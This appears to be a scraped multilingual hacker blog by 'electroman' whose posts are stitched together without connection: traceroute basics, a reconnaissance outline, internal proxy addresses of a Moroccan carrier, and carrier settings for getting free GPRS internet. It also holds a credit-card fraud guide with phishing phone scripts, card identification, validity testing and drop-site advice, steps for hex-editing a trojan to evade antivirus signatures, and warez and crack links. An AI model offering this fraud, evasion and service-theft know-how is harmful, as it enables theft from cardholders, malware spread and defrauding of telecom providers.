wap.meditel.ma.www.4shared.com

wap.meditel.ma.fotochatter.com/index.php

wap.meditel.ma.m.vtap.com

wap.meditel.ma.ringermobile.com

تعرف على

Traceroute


الأمر Traceroute وهو من أوامر الدوس ويستخدم لتتبع المسار حتى الوصول الى العنوان او الموقع المطلوب تتبع المسار له.

فكره تتبع المسار قائمه على فكره بسيطة وهي تزويد حزمه البيانات المرسله من الحاسب بخانه تسمى (Time-to-live) او تختصر بـ TTL و المقصود بها زمن الحياه للحزمة. يوضع في تلك الخانه رقم على سبيل المثال (3) و هذا يعني ان الحزمة ستعيش ثلاثه قفزات (Router) او خادم (Server) خلال تجولها عبر الشبكه.


الذي يحدث كالتالي:
لنسمي النقطة التي يكون فيها محول او خادم في الشبكه بنقطة التوزيع.
يقوم الحاسب بأرسال الحزمة و فيها محدد عمرها برقم وهو TTL عند وصول الحزمة لنقطة التوزيع الأولى (للمحول الأول في الشبكه (Roter) او الخادم) تقوم نقطة التوزيع بتنقيص هذا الرقم بمقدار واحد ثم ترسل الحزمة للنقطة التاليه.
عندما تصل الحزمة لنقطة توزيع بحيث يكون عمر الحزمة صفر بعد انقاص واحد منها ترسل نقطة التوزيع رد لمصدر الحزمة (حاسبك) تخبره عن موت الحزمة (اي توقفها عند تلك النقطة) و ضمن الرد تكون هناك المعلومات.
من الضروري وضع عمر للحزمة و الا ستعج الشبكات بحزم تائه تتنقل من نقطة الى نقطة بدون هدى.

ماذا يحدث عند استخدام الأمر Traceroute ؟
يقوم الحاسب بوضع عمر الحزمة 1 ثم يرسلها فيصله الرد من نقطه التوزيع الأولى (بالعزاء).
فيقوم بارسال الحزمة مرة أخرى لكن بعمر يساوي 2 و بذلك يحصل على رد النقطة الثانيه. و يكرر العمليه حتى يصل الى العنوان فيقوم الحاسب المقصود بالرد من اي منفذ مفتوح لديه.

طريقة استخدام الأمر Traceroute

من نافذه الدوس أكتب الأمر التالي و سنستخدم موقع www.linux.org
او يمكن استخدام رقم تعريف الشبكة IP
C:> tracert 198.182.196.56


لأيقاف امر التتبع أضغط (Ctrl+C)

لحفظ نتيجة التتبع في ملف أضف
tracert www.pmail.com > tracert.txt
ELectroman

أذا رغبت في اضافه بيانات تتبع عدة مواقع في نفس الملف أضف
tracert www.rpmfind.net > tracert.txt

تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت

و سيتناول الموضوع التالي:-
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
أ- استخدام الاداه whois من سطر اوامر لينكس (افضل توزيعه redhat 7.2 )
ب- ملقمات whois الهامه علي مستوي الانترنت
ج- استخدام الاداه sam spade علي ويندوز
د- استخدام الاداه traceroute من سطر اوامر لينكس و الاداه tracert في ويندوز

2 - تقفي اثر الشبكه الداخليه و اسماء نطاقتها
أ-استخدام الاداه nslookup من سطر اوامر لينكس او من سطر الاوامر في ويندوز 2000

3 - معرفه نوع نظام التشغيل
أ-استخدام الاداه المتعدده المهام gif langard
ب-استخدام موقع netcraft لتحديد نظام التشغيل

4 - البحث الحر في الانترنت لتجميع اكبر قدر من المعلومات عن الشبكه الهدف

5 - التقاط التعليقات البرمجيه
أ - استخدام خاصيه view source في المتصفح لقرائه التعليقات البرمجيه


6 - طرق وصل اجزاء الشبكات الداخليه لتكوين شبكه كبير(vpn , remote acces)


7-استخدام اليونكس شيل لعمل الاستعلامات التس تحتاج فيها الي استخدام لينكس عبر الانترنت
أ - طريقه التسجيل في يونكس شيل مجاني
ب - اختيار الشيل المناسب

8 - وصلات لتنزيل الادوات المطلوبه و اماكن الحصول عليها

==================================================
تقفي الاثر لمنظمه معينه
==================================================
ان تقفي الاثر هو احد اهم الخطوات التي يقوم بها الهكر الحقيقي ليكي يضع و يكون صوره في ذهنه عن طبيعه الهدف
و اسهل الامور هو تقفي اثر التكوينات المرتبطه بالانترنت و ذلك من حيث :-
نظام التشغيل
و خدمات tcp و udp
والبروتوكول العامله
و معرفه اسماء الميادين العامه و التقاط بانرز البورتات المنصته و خدمات انصاتها
تعداد بروتوكول SNMP بروتوكول التحكم بالشبكه البسيط
و معرفه الشيرز عبر بروتوكول SMB
اسماء المستخدمين و المستخدم الفعال
طول الباسورد و قوتها و امكانيه كسرها
من يملكون الصلاحيه بالوصول عبر ACLs
معرفه حوائط النيران و انواعها و تكنولوجيتها
امكانيه استخدام اتصالات مشفره
الطرق العامله في ال Remote administration
الويب سيرفرز
الثغرات العامله
و غيرها

ايضا تقفي اثر الانترانت او الشبكات المحليه
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
من حيث البروتوكولات المستخدمه tcp/ip ipx/spx appletalk و غيرها
طرق ربط اجزاء الشبكه هل يتم عبر direct connections , VPN , Remote acces
ارقام الوصول البعيد
اليات التحكم بالوصول
و الكثيير جدا جدا منه ما سوف نستخدمه الان و منه ما سيستخدم فيما بعد في مستوي اعلي قليلا

الان نبدأ بالدرس الفعلي بعد تلك المقدمه الطويله
==================================================
1 - تقفي الاثر لانظمه الشبكه المرتبطه بالانترنت
==================================================
يتم ذلك باستخدام الكثير من الادوات التي اكثرها يعمل علي لينكس و بعضها علي ويندوز
و سوف تكون البدايه مع استخدام الاداه whois من سطر اوامر لينكس
Electroman

better than ever

un site pour les hackeurs professionnelles pour leurs rechers
http://www.google.com/intl/xx-hacker

NEWS SUR MAROC TLECOME GPRS CONNECTION

EXCLUSIVE

projet fucking ass maroc telecome
sous code
FAMT
bjr chér-e-s clientèles

hier et aujourd'hui jé fé des recherches sur le proxy ip des poins acces suivant mmsiam
www.imgprs.ma
et je trouve des choses intersectant es telle que :

point acee mmsiam ip proxy et 10.16.35.50 : l ip racine de serveur et :

A1 192.168.171.131 ((((ip racine )))


A2 192.168.173.36

A3 192.168.240.2

A4 192.168.241.20

A5 10.16.35.50

point acce : www.iamgprs.ma ip proxy 212.217.54.133 lip racin de serveur et :


B1 192.168.171.131 ((((ip racine )))

B2 192.168.173.36

B3 192.168.240.2

si vous avez remarquez le A1 ip racine de serveur point acce iamgprs et le meme sur le point d'acce sur mmsiam et puisque le traget des ip et le mem de puis A1 a B1 A2 b2 ..... et puisk aussi une trou de sécurité et déclencher sur le point accee mmsiam alors cest bientaux www.iamgprs.ma
vos commentaires svp
mr electroman

carding

الجزء الاول:

هناك على الاقل 3 انواع من اجهزه الحمايه على الcredit card التي من المفروض الا تعرفها كمستخدم عادي و هي: ..
أ-account number رقم الحساب
ب-signature panel لوحه الامضاء
ج-the magnetic strip الستريب الممغنط
و سنقوم في هذا الجزء-بإذن الله-بشرح كل واحده على حده

أ- the account number رقم الحساب
--------------------------------
البطاقه الحمايه الاجتماعيه بها 9 ارقام ... رقم التليفون المنزلي، متضمن كود المنطقه،به 10ارقام ... لكن بطاقه master card بها 20 رقم..لماذا كل هذه الارقام؟؟
ليس مهما حسابيا لأي credit-card account ان يكون به اكثر من 8 ارقام..كل حامل كارتcardholder يجب (طبعا) ان يكون له رقم متفرد..visa و master card عندهم تقريبا حوالي 65,000,000 حامل كارت..لذا فنظام ترقيمهم يجب ان يحمل على الاقل هذا العدد من الارقام المتاحه
هناك 100,000,000 احتمال ممكن في رقم مكون كن 8 ارقام 00000000,00000001,00000002 حتى 99999999 لذا 8 ارقام كفايه جدا.ليسمح بتطور مستقبلي يكفي مثلا ان يجعلهم 9ارقام فهذا يزيد الاحتمالات لبلايين..و لكن في الحقيقه visa card بها 30 رقما و احيانا اكثر.american express بها 15 رقم.carte blanche به 10 ارقام.. لكن في هذه الشركات العملاقه يخططون لمستقبل كبر حتى يستطيعون مستقبلا استيعاب بلايين المشتركين و الارقام الزائده للحمايه..
مثلا رقم كارت visa card هو 4211 503 417 268 (من اليمين للشمال لكن في الانجليزيه تكتب بالعكس)..كل شراء بالكارت يجب ان تدخل رقم حسابك..لكن الكمبيوتر قد يرتكب خطأ و يسجل مثلا 4211 503 417 286
فائده نظام الترقيم الـ13ـري هو ان اي حامل لvisa card ممكن ان يكون حامل لأي هذه الارقام..هناك 10 تريليون احتمال.فقط 65 مليون من هذه الاحتمالات هي ارقام حقيقيه و فعاله..و احتمالات الخطأ ستنخفض لنحو 1 في ال150الف !!!! ...
هناك ايضانظم ترقيم اكثر امنا..من الكوادرليون احتمال ممكن في نظام الamerican express الـ15ـري.فقط 11 مليون رقم حقيقي..نسبه الخطأ او التجربه للحصول على رقم حقيقي صدفه لا تتعدى ال1 في 90مليون!!!
اما نظام الmaste card الـ20ـي فهناك حوالي 100 كوانتيليون احتمال(100000000000000000000) لذا فالارقام العشوائيه التي قد تكون موجوده لا تتعدى ال1 في التريليون !!!!! ...
من الاشياء الاخرى.. هذا يجعل من الممكن لاعلانات التلفاز ان تدعوا حاملي الكروت للشراء عبر الهاتف.الoperators لا يرون الكروت و لا لوحه الامضاء..كيف يتأكدون من ان المتصل لديه credut card ؟؟
هو يؤسس ثقته على الحمايه المتمثله في نظام ترقيم الـaccount numbers..فلو واحد اتصل و اخترع رقم كارت..الرقم اكيد لن يكون رقم موجود.. و من السهل كشف زيفه، لكل الاسباب العمليه الطريقه الوحيده للحصول عاى account numberاصلي هو عن طريق قراءته من كارت ائتمان !!!...

ب- the Signature Panel رقم الحساب
---------------------------------
لا يجب عليك مسح لوحه الامضاء لو كنت تريد سرقه كارت! ربما تظن انه يجب كتابه اسم حامل الكارت.ربما ترى ان هذا رائع لو اردت ان تحصل على بعض المال من البنك،لأنهم سيجعلونك توقع على لوحه يجب ان تطابق الامضاء عالكارت.لو انت او اي احد اخر عمل هذا.عاجلا ستجد الكارت غير عامل..
بعض الكروت لها خلفيه مرسومه بحيث لو مسحت الامضاء تمسح الخلفيه.و هناك"بصمه اليد" المصممه على الamerican express،شعارات mastercard و visa المكرره على اللوح بتاعتهم.
هناك طرق اقوى للحمايه،يقال ان عندما تمسح الpanel كلمه سريه"VOID"،تظهر لمنع استخدام الكارت.Adminstation (احد كتاب الكتاب) ضحى ب15 كارت لتجربه هذه النظريه
الممحاه العاديه ستمسح الsignature panels لو بالراحه و ببطء.الpanels ستذوب بحته قماش و energine.هذه الطريق تذيب الpanels بنظافه.من ال15 كارت. 6 لم يوجد شئ تحت الpanel و 9 بهم كلمه VOID. في كل الحالات كانت مكتوبه بحروف صغيره و مكرره جنب بعض

---------------------
هذا هو كيفيه تصنيفهم
---------------------

\\\\\\\\\\\\\\\\
كروت بكلمه VOID
\\\\\\\\\\\\\\\
Bloomingdale's
Bonwit Teller
Chase Convenience Banking Card
First Interstate Bank Card
I.Manin
Joseph Magnin
Montgomer Ward
Visa(chase manhatten) 1

\\\\\\\\\\\\\\
كروت بدون VOID
\\\\\\\\\\\\\\

American Express Gold Card
Brodway
MasterCard (city bank)1
Neiman-Marcus
Robinson's
Saks Fifth Avenue
-------------------------
عندما قربوا للنور القوي كلمه VOID كانت واضحه خلال Bloomingdale's card حتى من دون تذويب الpanel!!

الطريقه للعب حول هذه الخاصيه!!
-----------------------------
هناك طريقه واحده فقط..
الدهن فوق الPANEL ! هذا سيعمل فقط لو الكارت ليس عليه رسوم.الكروت التي لها الوان صعبه ايضا تكون مستحيله(saks panel لونها greenish \-tan khaki colour!!!!)

ج-the magnetic strip الشريط الممغنط
------------------------------------
و آخر اداة حمايه هي في الخلف.شريط بني ممغنط هو الMagnetic strip.ربما تظن انه يحوي بعض المعلومات عن حامل الكارت.الشريط حقيقة لا يحوي معلومات اكثر مما يحوي جزء مماثل في شريط تسجيل!!.
الشريط لا يحوي معلومات غير رقم الحساب و معلومات اخرى مماثله.و اي معلومات اخرى يحتاجها automatic-teller transaction.
ايضا.تاريخ انتهاء الكارتcard expiration date..ليس واضحا اذا كان الidentification number مسجل على الشريط ام يتم استدعائه من كمبيوتر البنك.الكثير من الصرافات الآليه.لها secret limit من 3 محاولات لوضع الpersonal identification number الصحيح.بعد 3 محاولات خاطئه..يصنف الكارت على انه مسروق و يصبحeaten اي يدمر.
من الممكن لخبطه البيانات على الشريط بتمرير مغناطيس عليه!!!

كود لون bloomingdale
---------------------
فقط في قليل من الحالات.لون الكارت يعني شيئا...هناك الكروت الذهبيه لAmerican Express,Visa,MasterCard و هي للزبائن المفضلين..كارت الAir travel له لونان احمر و اخضر..و الاخضر افصل..و اكثر



النظم التي تتبع هذا النظام هي bloomingdale..ال5 الوان لكروت bloomingdale تحدد اي نوع من العملاء انت..الازرق هو لعمال الشركه انفسهم.و اللون الاساسي هو الاصفر..اما الاحمر يعطي حامله 3 شهور free intrest و يعطى للعملاء الذين يقومون دائما بشراءات كبيره.الكارت الفضي جيد للunlimited لكن عند السفر الcharges يجب ان تدفع خلال 30 يوم..الكارت الذهبي محفوظ لأفضل و اكبر عملاء البنك

---------------------
الجزء الثاني
---------------------
مقدمة الجزء الثاني:
---------------------
في هذا الجزء سنريكم بعض التقنيات الجديده التي تمكنك من احصول على الكروت لوحدك..سنذكر ايضا كيفيه التعرف على الكروت و معرفه ان كانت valid ام لا!!
-----------------------------------------------------------------------
اولا سأذكر طريقه TRW.و ان اعجبتك فأنا ارشح لك ان تحصل على كتاب Major havok&british bloke عن هذه الطريقه و سيعجبك كثيرا.(انا ابحث لو وجدته سأنشره هنا و على من يجده ان يتفضل بنشره!)

TRW(من فهمي لها اظن انها تخص المريكيين فقط..انا لم افهمها جيدا ارجوا ممن يعرف اكثر ان يخبرنا)
---

المودم بتاعك يجب ان يضبط هكذا:
Half duplex
7 bits
1 stop bit
even parity
dial-up:214-980-2524
اول ما تبقى online انتظر للTRW prompt و اضغط ctrl-g ،انتظر صوت beep .ثم،اكتب الID الرباعي الخاص بالstate التي يقطن بها الشخص الذي تريد بياناته...ثم اضغط RETURN.بعدها اكتب البيانات التيتريد معرفتها عن الشخص صاحب الكارت بالشكل التالي:
RTS ID/PASSWORD LASTNAME FIRSTNAME ...,STREET # FIRST CHARACTER OF STREET NAMEZIP CODE
طبعا كل هذا في نفس السطر..بعد هذا اضغط RETURN ، H-Y ، RETURN، CTRL-S
لشخص اخر قم بالكتابه بنفس الطريقه في سطر اخر‍‍‍‍
---------------------------------
getting credit limit and account #1
----------------------------------
ها هو حوار من الممكن استخدامه في الهاتف للصول على معلومات كهذه(أرأيتم..social engineering ..انه يستخدم في كل مجالات الهاكينج):
----------
انت:اهلا،هنا بنك امريكا نحن نتصل لنعلمك ان حد الvisa card الخاص بك قد ارتفع ل$1.200.00
الضحيه: لكن حد الكارت بتاعي كان دائما $10.000.00‍‍‍‍‍!!!!
انت: يبدو ان هناك مشكله في الكمبيوتر،ها الكارت بتاعك في متناول يدك؟هل ممكن ان تقوم بقراءه الارقام المكتوبه ؟
الضحيه: حسنا،انها 9834 864 874 9857
انت: شكرا.سأتحقق من هذا الخطأ بنفسي.حالا...
---------
طريقه اخرى هي الحصول على هذه الكروت هي الذهاب لمحل كبير و البحث في صحائف القمامه حوله و هي ما تسمى بالdumpsting (مقزز مش كده!)
-------------------------------------
\\\\\\\\\\\\\\\\\\
تحديد الكارت الذي حصلت عليه(روعه!!)
\\\\\\\\\\\\\\\\\
------------------------------
American Express

/--------------------------
= American Express =
= 37XN NXXXXX XXXXX =
= MM/Y1 THRU MM/Y2 Y1 =
= David Lightman AX=
\--------------------------/
الرقمين الاولين دائما 37.لو الN's بين 80 و 89 اذن فهو goldذهبي و لو الn 37 فهو platinium بلاتيني
اول تاريخ هو تاريخ الذي تلقى فيه david الكرت..اما التاريخ الثاني فهو تاريخ الانتهاءexpiration date اما الy1 فلا تعني شيئا
------------------------------
MasterCard

/--------------------------\
= MasterCard (citibank)=
= 5XXX XXXX XXXX XXXX =
= XXXX AAA DD-MM-YY MM/YY =
= David Lightman =
\--------------------------/
اظن انك ستفهم هذا الكارت بسهوله..شئ واحد يجب معرفته..هذا الكارت يبدأ دائما برقم 5
----------------------------
Visa

/--------------------------
= VISA =
= Chase Manhatten =
= =
= 4XXX XXX(X) XXX(X) XXX(X)=
= MM/YY MM/YY*VISA =
= David Lightman =
\--------------------------/
هذا الكارت سهل جدا معرفته اسمه embossed عالكارت(اي يظهر بالكاربون) هناك شئ جيد..يبدأ دائما 4333 او 4444
-----------------------------
Wells Fargo

/--------------------------\
= David Lightman =
= MM/YY - MM/YY =
= 4024 0071 XXX(X) XXX(X) =
= L _/ =
\--------------------------/
هذا من الكروت الظريفه..لو بدأ ب 4024 0071(اقلب شمال عشان تفهم) اذن فاعرف ان معك واحد.ايضا لو ال"-" بين التواريخ "*" فاعرف انه gold card و لو الL متبوعه ب'_/' بقت "C" فاعرف انه classic card و لو الL بقتP يبقى premier card.......
---------------------------
\\\\\\\\\\\\\
اختبار الكروت
\\\\\\\\\\\\
للأسف شباب هذه قطعه بسيطه لكن لم افهمها لذا سأكتبه بالانجليزيه و على من يفهمها ان يترجمها و ينشرها مع الشكر:
To determine if the cards are any good or not is pretty easy. You go into the store you ripped these things off from and look by their phone. You should see a number and almost allways a merchant number. Another way to find these numbers is to wait untill they dial the numbers. Try to remeber the numbers that they dial. This method is a little better for sometimes written numbers in the stores are forgotten about and might have been changed since the last time they had changed the written copy. Yes, some Target workers are smart enough to memorize a number, and mabye even a merchant number.
When you call this number, and you get passed all the "red tape", then ask if the credit card number is clear for the amount you want to spend.
Ask the operator to cancel the auto withdrawal and hope she will, not many operators are that dumb.
--------------|
الجزء الثالث |
--------------|
The Dropsite(مركز اسقاط المسروقات!!)
\\\\\\\\\\\\\
يجب ان تجد مكانا آمنا لكل الذي اشتريته بالبطاقات المزوره.لو كنت تريد ان تدخل في العميق،ابعثهم على منزلك!!
لتحصل على dropsite جيد يجب ان تجد منزل مهجور.لكن يجب ان يكون منظره كما ان به حياة...عندما تكون جاهزا لطلب الاشياء التي ستشتريها،افعل ذلك ليلا.و اترك رساله عالباب بأن لديك عمل ليلا و ان يتركوا المشتروات في الحديقه الخلفيه.هذه افضل طريقه في رأيي لكن.سأخبرك بطرق اخرى.
استأجر مكانا لمده بسيطه..حتى تحصل على ما تريد و الغي الايجار و اختره مكانا بعيدا عن منزلك حتى تستطيع بعدها الاختفاء من المنطقه.
و هذه اخر طريقه تعتمد عالهاتف اقرأ هذه المحادثه بيني و شركه سوني:
انا:اهلا.انا فلان الفلاني و انا نهتم بالعرض ا



لخاص بجهاز سوني الجديد.و احب ان اتكلم مع احد في الامر
العامل:اكيد.سأخبرك بكل ما يهمك(...كلام عن الجهاز...)
انا:حسنا..يبدوا ان هذا ما احتاجه فعلا.هل استطيع شراءه بالفيزا و يأتي ابن عمي بعد ذلك لأخذه لأني مريض و لا استطيع الخروج؟؟
العامل:طبعا نحن في الخدمه ...الخ..
لكن انا لا احبذ هذه الطريقه..انا افضل الاولى.لكن as u like
الآن اليك تلك النصيحتين:
1-يفضل عندما تتصل للشراء ان تفعل ذلك ليلا ..ساعتها يكون الoperators متعبون و لا يتذكرون ما حدث بعدها
2-اياك اياك من استخدام نفس الdropsite مرتين..عندما تستخدم مكانا ما و تنتهي..انسااااه تماما
و نصيحه اخيره:
الكثير من الهاكرز ماتوا بتلك الطريقه
Many hackers died that way
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
انتهى الكتاب......
ELEctroman

the new is never be dead with the king

exclusive
voila des sites nv et teste par notre équipe plus que 25 fois

site pour navigation anonyme en https : ça marche sur pc et gsm



electroman hacking surfing free

https://gmail.google.com/?dest=http%3A%2F%2Fblablabla.

https://freeonlineproxy.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://unblck.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://helloschool.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://blackdile.com/cgi-bin/nph-gov.aspx/000110A/687474702s7777772r676s6s676p652r636s6q2s
https://ww2.theevader.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29t&hl=1111101001 best had sa"a

https://www.dubaiproxy.com/surf/index.php?q=d3d3Lmdvb2dsZS5jb20%3D&hl=3ed
https://proxyman.co.cc/anonymproxy.info/index.php?q=aHR0cDovL3d3dy5nb29nbGUuc2Uv
https://0302.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5mcg%3D%3D&b=61
https://z-80.com
https://www.coolpanda.
https://www.ninjacloak.com/index.php/1010110A/9bd94580370c55a29ff83d6f7360d14ff55344431278ce4b33a017100?hl=fr&q=hi&btnG=Recherche+Google&lr=
https://www.amgstealth.com/browse.php?u=aHR0cDovL3d3dy5nb29nbGUuY29t&b=15
https://www.pagewash.com/nph-secure.cgi/000110A/uggcf:/=2fjjj.tbbtyr.pbz/nppbhagf/FreivprYbtva=3ffreivpr=3dznvy&cnffvir=3dgehr&ez=3dsnyfr&pbagvahr=3duggcf=253N=252S=252Sznvy.tbbtyr.pbz=252Sznvy=252S=253Suy=253Qse=2526gno=253Qjz=2526afe=253Q1=2526hv=253Qugzy=2526ml=253Qy&ygzcy=3dqrsnhyg&ygzcypnpur=3d2&uy=3dse

Imedia and maroc telecome your GPRS confeguration is here is here...//// maroc telecome? meditel? envoiyer votre configuration gprs

vous ete client chez meditel ou bien maroc telecome tu vx avoir ta configuration gprs gratuitement voila la solution :
maroc telecome : http://www.mobileiam.ma/param_mobile.asp

meditel : http://meditel.dmc3.sicap-france.com/frontoffice.view

notez bien que tu doit avoir le gprs activer sur ta carte si vous ne savez pas apellez :

meditel : 121

maroc telecome :888

mr electroman news merci et bonne journée

weebo get fast ur connection with firefox / avoir weebo rapide avec firefox

to have a fast weebo with firefox please fellow the instruction :
Clearing Your Cache/Cookies

Many issue can be alleviated by clearing your browser's Cache and cookies. Before you clear your cache and cookies for the first time, close all of your browsers, then open up a new one.

For Firefox users:

1. Click on “Tools” at the top of the browser window

2. Select “Clear Private Data” from the drop-down menu

3. Put a check mark next to “Cache” and “Cookies”

4. Click on the “Clear Private Data Now” button

msn 8 avec gprs maroc telecome connection presenter par electroman

c'est vos avez une connection iam pirater sur votre pc (voire notre article sur internet gratuit) voila un site ki peux eter utile pour toi de chatter envoyer vos photos et mem avoir une discution rapide
https://meebo.com
mr electroman 078324021

c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts

presenter par electroman
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
voila le lien www.hackthev3.com have fun

Comment intercepter la signature d'un virus et la changer

Comment intercepter la signature d'un virus et la changer...
Tout d'abord, Qu est ce une signature ???
Une signature est un petit bout de code en Hexadecimal propre a un trojan, qui est détecté par les antivirus.
A quoi peut servir de connaitre ces signatures ?
Si vous savez ou se trouve les signatures , vous pouvez les modifier en Héxadécimal afin de rendre votre trojan indétectable par les AV.
------------------------------
Vous aurez besoin de :
-AVPOFFSET
-Kaspersky (installer sur votre ordinateur)
-Hexiwin (www.telecharger.com), ou un autre logiciel du même genre...
-Un serveur de trojan qui n'a pas été modifié (c'est à dire : non Packer, crypté, bindé, etc...)
------------------------------
Pour commencer, désactivez votre A-V. Ensuite allez dans le répertoire ou il y a les fichiers ".AVC" (exemple : " C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Lite\BASES ").
Si c'est différent chez vous faite tout simplement une recherche sur votre disque dur, de fichiers avec une extension : " .AVC " vous aurez ainsi le répertoire .
Dans ce repertoire vous mettez le programme AVPOFFSET.EXE et le SERVER.EXE.
Ensuite ouvrez une fenêtre MS DOS (démarrer puis exécuter et command) .Allez dans le répertoire ou vous avez mis AVPOFFSET et tapé ceci :
" AVPOFFSET SERVER.EXE "
Ensuite patientez (cela dure +- 1-2minutes)
Puis vous obtiendrez ceci:
SERVER.EXE infected: backdoor xxxxxx
Signature 1 found :
Offset : 511854 ( 7CF6eh)
Length : 7 ( 7h)
checksum: (2FCC5587h)
Signature 2 found:
Offset : 515903 ( 7DF3FH)
Length : 255 ( FFH)
Checksum: ( 5574DDD9H)
Ce qui est écrit ci-dessus est fondamental pour la suite.
Ouvrer ensuite "SERVER.EXE" avec HEXIWIN.
Puis faites " EDIT" puis "GOTO..."A coté d'offset" tapez "511854" et coché la case "DEC" ("511854" est l'offset de la 1 ère signature en Décimal)
Une autre solutions : vous pouviez taper aussi " 7CF6e " et coché la case "hexadécimal" Cela revient au même sauf que cette fois ci l'offset est écrit en Hexadécimal.
Ensuite vous devez obtenir de ce style-ci :
756E5365727669636573000000FFFFFFFF (hexadecimal)
RunServices....... (Ascii)
Cette signature est facile a modifier puisqu'elle détecte seulement par du texte. Dans cet exemple elle détecte le Texte " RunServices "
Pour vous débarrasser de cette signature, il suffit de modifier un peu le texte en ajoutant par exemple des majuscule ou des minuscules. voila qq exemple :
exemple: RunServices ==> runservices ==> RuNServices
Il y a évidemment plein de possibilités de modifications, mais la chose a ne surtout pas faire c'est d'enlever ou d'ajouter un caractère, ce qui aurait pour conséquence que le serveur ne fonctionne pas.
------------------------------
Etudions maintenant la deuxième signature...
Retournez dans " EDIT" puis " GOTO ",tappez l'offset de la 2 ème signature (515903 en décimal)
Vous obtenez ensuite ceci :
8D45F8
Ceci n'est plus une signature aussi simple que la précédente :
Ecrite en hexadécimal,elle est en fait un " LEA EAX,Dword ptr [ebp-08] en assembleur.
Cela signifie que c'est une inscription dans le registre.
Il faut alors trouver une instruction équivalente à celle ci.(avec le même alogorythme)
Bon la y a pas 36 solutions, il faut avoir qq bases en assembleur , j'vous donne l équivalent :
exemple: LEA EAX,Dword ptr [ebp-08] ==> Mov EaX,Dword Ptd ds:[Ebp-08] (un équivalent de cette signature)
Normalement, votre serveur est ensuite plus détecté, ce qui est bien utile , si vous êtes un adepte des trojans célèbres comme subseven, optix pro, etc..

site web pour tt vos telechargement derb ralef cest ici

derb ralef

humm logicielles a 10dh tt le derb ralef c'est d'ici ils télécharge et ils vents
alors profiter

catégorie 1 présent par mr electroman

http://www.pegasoft.cz/

http://www.ddlworld.com/

http://www.bg-warez.org

http://www.101uses.com/ ãÊÚÏÏ ÇáæÙÇÆÝ

http://stormzone.org/news.php

http://qpxqp.com/weblog.php/weblog.php?id=C0_1_1

http://www.wolkysoft.us

http://www.soft-best.net

http://www.directwarez.com/ddl.php?page=1


catégorie 2

1. http://www.downshow.com
2. http://www.fixdown.com
3. http://www.ttdown.com
4. http://www.cnyou.com
5. http://www.soft168.com
6. http://www.soft163.com
7. http://www.99soft.com
8. http://www.jetdown.com
9. http://www.1777.net
10. http://www.chinesejia.com
11. http://www.shunsheng.yeah.net
12. http://www.mylizi.com
13. http://www.soft888.com
14. http://www.vdown.net
15. http://www.ttxz.com
16. http://www.winzheng.com
17. http://www.cn911.comwww.ok911.com
18. http://www.crsky.net
19. http://www.ynkm.com
20. http://www.5324.net
21. http://www.soft.88oo.com
22. http://www.iskydown.com
23. http://www.downbest.net/?1key.126.com
24. http://www.pcsight.com
25. http://www.downsoft.net
26. http://www.softicp.com
27. http://www.heibai.net
28. http://www.hanzify.org
29. http://www.911joy.com
30. http://www.downme.com
31. http://www.soft999.com
32. http://www.51xz.net
33. http://www.ydxz.cn.st
34. http://www.cehgx.126.com
35. http://www.xpblue.com
36. http://www.zhtx.net
37. http://www.whatisnet.net
38. http://www.cyoo.net
39. http://www.adownb.com
40. http://www.weste.netwww.softuser.com
41. http://www.9iv.com/down/
42. http://www.fbstu.com/index.asp
43. http://www.gupin.com
44. http://sz1001.net/
45. http://www.258soft.com/


pour les crack et serial



http://world.altavista.com/
http://www.systransoft.com
http://www.serilas.com

mr electroman

imedia connection gratuit

internet gratuit avec le service imedia comment.?

pour avoir imedia gratuit sur ton mobile enter ces paramters svp

avant tt assurer que ta carte Sim et active gprs si nn appelle 121
comment connaitre la cart si activer ou bien nn bah si ta jamais apller 121 alors votre cart nest pas active activer la ou bien si ta un nokia un singe G apparaitre sur onglet resau ou bien de flèche ce montre
manuel
proxy 10.8.8.8

apn:wap.meditel.ma

id utilisateur MEDIWAP

mot de passe :MEDIWAP

authentification : sécurise

automatique
entrer dans ce site et env les paramètres a ton mobile puis changer onglet sécurité en activer
http://meditel.dmc3.sicap-france.com/frontoffice.view

remarque si votre mobile acceptes le certificat shh et rsa si nn tu px pas accéder gratuitement plus d'information sur shh et rsa voire article sur imedia
c'est tt merci

IMEDIA et il gratuit .??

pour quoi i media est gratuit avec des utilisateur de service mais il ne marche pas avec des autres membres du service imedia même si l'option du sécurité et active?.?

réponse : après des longes recherches que je fais personnellement je trouve que le secret c'est dans les certificats de identification en gros c'est le shh et rsa plus dinfo sur google
si votre gsm utilise les certificat shh ou bien rsa votre téléphone peux ce connecter a internet gratuitement mais si c'est le contraire vos ne pouvez pas alors il faut payé pour ça :)
et c'est pour ce la en trouve que il y a des membre qui utilise gratuitement le service après avoirs activer loption de sécurité et d'autre malgré ça ne peuvent pas ce connecter

merci votre frer amine raghib alias electroman

attention maroc telecome free connection to ur pc

how to get free connection to ur pc via gprs connection ???

humm is easy

what do you need before

cabel: between ur pc and gsm phone

pc suit : if u have a cabel for ur phone u need a driver+ pc suit is also in ur cd or tray to search and download ur dirver.
each gsm has proper dirver so if u have like for exmpel nokia u must found pc suit for nokia and download it

firefox: if u want have a fast connection than u must have download firefox is usiful than internet explorer

sll surfing link : the sll is a secure serfing but is not all u must be in ssl mode and anonymos so for this reason this is the anonymos browser that u must us
https://linkitto.com
https://www.beatfiltering.com

dont froget if the first browser is blocked tray the secound and vers versa

ok after have the tooles let's go
1 install ur pc suit
2 install ur firefox
2 go to ur pc suit and in internet insert this configuration
acess point : mmsiam
user : let the box blank
password : let the box blank

after that push connect
after connection go to firefox in tools go to option and after that to advance and network go to setting and slect manuel proxy and insert this configuration
proxy 10.16.35.50 port 8080
slect ok and exit
go to adress insert https://linkitto.com
after the page has been download insert in the blank box ur adress and have a nice surfing

driver adress web site

hi !!! and welcome
mr amine from morocco
age ;22
my mission is to help u in ur life
my pics here u found it
